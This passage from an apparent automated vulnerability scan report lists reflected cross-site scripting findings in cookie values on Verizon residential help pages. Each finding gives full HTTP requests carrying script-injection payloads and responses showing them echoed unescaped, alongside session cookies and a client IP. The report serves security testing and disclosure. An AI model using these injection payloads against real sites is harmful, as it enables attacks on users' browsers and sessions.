Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 126538

<!-- Vignette V6 Fri Nov 19 16:15:44 2010 -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<!-- mp_trans_remove_start -->
<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f">
...[SNIP]...

3.258. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4fea9<script>alert(1)</script>38ddcfffc57 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4fea9<script>alert(1)</script>38ddcfffc57; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:53 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:53 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4fea9<script>alert(1)</script>38ddcfffc57</span>
...[SNIP]...

3.259. http://www22.verizon.com/residentialhelp [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload bbbc1<script>alert(1)</script>763928accef was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXbbbc1<script>alert(1)</script>763928accef; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:52 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:52 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXbbbc1<script>alert(1)</script>763928accef </span>
...[SNIP]...

3.260. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload efb2c<script>alert(1)</script>d7c9c2d6cea was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=efb2c<script>alert(1)</script>d7c9c2d6cea; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:40 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> efb2c<script>alert(1)</script>d7c9c2d6cea</span>
...[SNIP]...

3.261. http://www22.verizon.com/residentialhelp/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 00:22:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:22:06 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span>
...[SNIP]...

3.262. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f9aa6<script>alert(1)</script>cdcfbe4067 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; 
ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48782
Expires: Sat, 20 Nov 2010 02:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:51 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; expires=Sun, 20-Nov-2011 02:22:51 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:51 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong> f9aa6<script>alert(1)</script>cdcfbe4067</span>
...[SNIP]...

3.263. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eab60<script>alert(1)</script>0a0f7cbd88c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXeab60<script>alert(1)</script>0a0f7cbd88c; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; 
ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48783
Expires: Sat, 20 Nov 2010 02:22:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; expires=Sun, 20-Nov-2011 02:22:49 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:49 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong>, TXeab60<script>alert(1)</script>0a0f7cbd88c </span>
...[SNIP]...

3.264. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668a0'><script>alert(1)</script>fc8df7db051 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668a0'><script>alert(1)</script>fc8df7db051; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
